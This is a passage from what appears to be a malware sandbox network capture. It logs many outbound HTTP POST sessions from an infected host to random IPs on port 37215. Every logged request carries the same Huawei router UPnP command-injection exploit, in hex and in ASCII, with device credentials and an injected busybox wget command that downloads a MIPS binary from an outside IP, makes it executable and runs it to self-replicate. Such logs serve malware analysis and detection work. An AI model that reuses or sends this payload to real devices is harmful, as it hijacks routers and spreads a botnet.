3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1517192.168.2.1351304197.155.159.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.493086100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1518192.168.2.1351690197.159.188.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.493086100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1519192.168.2.1341170197.15.105.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.493194103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1520192.168.2.1341380197.4.145.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.493206978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1521192.168.2.134215641.159.232.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.493218899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1522192.168.2.1348136157.192.179.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.495229006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1523192.168.2.1356348166.27.15.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.495237112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1524192.168.2.1336122157.239.28.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.495275021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1525192.168.2.135601054.196.50.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.495281935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1526192.168.2.1357964157.129.57.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.495281935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1527192.168.2.135400041.236.71.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.495284081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
